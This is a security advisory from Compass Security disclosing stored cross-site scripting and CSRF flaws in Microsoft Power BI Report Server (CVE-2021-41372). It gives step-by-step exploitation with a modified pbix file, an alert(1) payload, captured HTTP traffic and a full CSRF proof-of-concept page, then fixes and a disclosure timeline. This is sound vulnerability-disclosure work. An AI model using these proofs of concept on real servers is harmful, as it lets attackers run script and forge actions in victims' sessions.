#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Power BI Report Server [1]
# Vendor:   Microsoft
# CSNC ID:  CSNC-2022-007
# CVE ID:   CVE-2021-41372
# Subject:  Cross-Site Scripting (XSS) [2]
			and Cross-Site Request Forgery (CSRF) [3]
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Emanuele Barbeno (advisories@compass-security.com)
# Date:     02.05.2022
#
#############################################################

Introduction:
-------------
Power BI Report Server is part of the Microsoft Power Platform and is an 
on-premesis solution for companies that won't or can't store data in the 
cloud-based Power BI Service.
This software is used to turn unrelated sources of data into coherent, 
visually immersive, and interactive insights. Data may be input by reading 
directly from a database, webpage, or structured files such as spreadsheets, 
CSV, XML, and JSON.

Affected:
---------
Vulnerable:
	* 15.0.1107.146

Not Vulnerable:
	* 15.0.1107.165 (KB5007903)

Technical Description
---------------------
The user's input data is not properly encoded when being echoed back to the 
user. Therefore, this data can be interpreted as executable code by the 
browser and allows an attacker to execute JavaScript code in the context of 
the victim's browser if the victim opens a malicious link.
Furthermore, the tested version fails to validate anti-CSRF tokens, thus this 
vulnerability can be exploited by an external attacker hosting a specific HTML 
code on a malicious website on the Internet. 

First, a valid template file is required. This can be downloaded from an already 
uploaded Power BI report (by clicking on the 3 dots on the top right corner of 
the selected template and then click on the Download drop down menu option) or 
from the Internet (e.g. https://zebrabi.com/income-statement-power-bi-template/).

A file with the pbix extension is downloaded. Using WinZip, it is possible to 
extract its content and modify the "[Content_Types].xml" file adding the "html" 
extension as follows (4th line):
```
<?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
 <Default Extension="json" ContentType=""/>
 <Default Extension="html" ContentType="text/html"/>
 <Default Extension="png" ContentType=""/>
 <Override PartName="/Version" ContentType=""/>
 <Override PartName="/DiagramLayout" ContentType=""/>
 <Override PartName="/Report/Layout" ContentType=""/>
 <Override PartName="/Settings" ContentType="application/json"/>
 <Override PartName="/Metadata" ContentType="application/json"/>
 <Override PartName="/Report/LinguisticSchema" ContentType=""/>
 <Override PartName="/DiagramState" ContentType=""/>
 <Override PartName="/SecurityBindings" ContentType=""/>
 <Override PartName="/DataModel" ContentType=""/>
</Types>
```

Then create a new file named xss.html with the following content inside the 
"Report/StaticResources/RegisteredResources" folder:
```
<html>
<body>
<script>
alert(1)
</script>
</body>
</html>
```

It is now possible to create the updated pbix file using the following command:
```
$ zip -r test.pbix *
```

And upload it to the Power BI Report Server by clicking on the Upload button
in the web interface. A new PowerBI report should be automatically added inside 
the current folder.

When opened inside the PowerBI web interface, one of the requests sent to the 
backend should containing the "RegisteredResources" string in the path 
(for example, http://<MY_DOMAIN>/powerbi/api/explore/resourcePackageItem/9b3db864-e628-4ec9-b3c2-ae2d4ec8135b/RegisteredResources/webinar-home-pagebackground9453047756543702.png).
It is possible to refence the uploaded "xss.html" file created before by changing 
the referenced file inside the URL as shown in the following HTTP request:
```
GET /powerbi/api/explore/resourcePackageItem/9b3db864-e628-4ec9-b3c2-
ae2d4ec8135b/RegisteredResources/xss.html HTTP/1.1
Host: <MY_DOMAIN>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<MY_DOMAIN>/powerbi
ActivityId: 308b608a-fa60-6d72-fc19-ddb78d081bc0
RequestId: b4c26e23-ee63-9ed6-5a3f-f3d3bc306393
X-PowerBI-ResourceKey: any
X-SSRS-ClientSessionId: fd99303b-c67e-20a0-26f0-07f584ad0665
Connection: Keep-Alive
Cookie: ai_user=sMsgC|2021-06-29T06:57:46.592Z
```

The HTTP Response contains the XSS payload and the content-type is set to text/html, 
thus the malicious JavaScript code is executed on the user's browsers:
```
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache
Content-Length: 63
Content-Type: text/html
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 29 Jun 2021 13:27:28 GMT

<html>
<body>
<script>
alert(1)
</script>
</body>
</html>
```

Because the upload template functionality does not correctly validate anti-CSRF tokens,
the following PoC can be used to create a new PowerBI report in the TEAM1 folder with name
ZebraBI_Income-xxe using a CSRF attack:
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/<MY_DOMAIN>\/Reports\/api\/v2.0\/PowerBIReports(Path=%27\/TEAM1\/ZebraBI_Income-xxe%27)\/Model.Upload", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------16833103012128430103573428477");
        xhr.withCredentials = true;
        var body = "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"Name\"\r\n" + 
          "\r\n" + 
          "ZebraBI_Income-xxe\r\n" + 
          "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"ContentType\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"Content\"\r\n" + 
          "\r\n" + 
          "undefined\r\n" + 
          "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"Path\"\r\n" + 
          "\r\n" + 
          "/TEAM1/Zebra_Income-xxe\r\n" + 
          "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"#odata.type\"\r\n" + 
          "\r\n" + 
          "#Model.PowerBIReport\r\n" + 
          "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"File\"; filename=\"temp-asp-aspx.pbix\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "PK\x03\x04\x14\x00\x02\x00\x08\x00\xbd|\xddR\x3e\xfe\xc9?\x1b\x01\x00\x00\x90\x03\x00\x00\x13\x00\x00\x00[Content_Types].xml\x9d\x92MN\xc30\x10\x85\xf7H\xdc\xc1\xf2\xbeu`\x81\x10JZ\t\xca\x8e\x02\"\x88\xfd\xc8\x99$\x86\xc4\xb6\xec\tJ\xce\xc6\x82#q\x05l\xb2\xabH%w9\x9e\xf7\xbd\xf9\xf3\xcf\xd7w\xbe\x1d\xfb\x8e}\xa2\xf3\xca\xe8\x82_\xac3\xcePKS)\xdd\x14|\xa0zu\xcd\xb7\x9b\xf3\xb3\xfcu\xb2\xe8Y\
[CUT BY COMPASS: PBIX FILE CONTENT]
\x00\x01\x00\x18\x00\x00S\xa6\xdb\xc8\x98\xd6\x01\xc0\x9e\xb6\t\xe6l\xd7\x01\x00S\xa6\xdb\xc8\x98\xd6\x01PK\x05\x06\x00\x00\x00\x00\x1e\x00\x1e\x00\xee\x0e\x00\x00\xd83\x0b\x00\x00\x00\r\n" + 
          "-----------------------------16833103012128430103573428477\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "submit\r\n" + 
          "-----------------------------16833103012128430103573428477--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
```

Workaround / Fix:
-----------------
Dangerous characters should be encoded on output according to the encoding 
rules of the respective type of context. The whole code should be analyzed for 
it and updated accordingly. For regular HTML body content, use HTML encoding [4]:
	* < -> &lt;
	* > -> &gt;
	* " -> &quot;
	* ' -> &apos;
	* & -> &amp;

Furthermore, the application should include a random token, which changes for each
user session. If a request is received by the server, which does not include
the correct token, it should be rejected by the server. [5]

Timeline:
---------
2021-08-10:     Discovery by Emanuele Barbeno
2021-08-11:     Initial vendor notification
2021-08-12:     Initial vendor response
2021-11-09:     Assigned CVE-2021-41372
2022-05-02:     Public disclosure


References:
-----------
[1] https://powerbi.microsoft.com/en-us/report-server/
[2] https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
[3] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
[4] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
[5] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html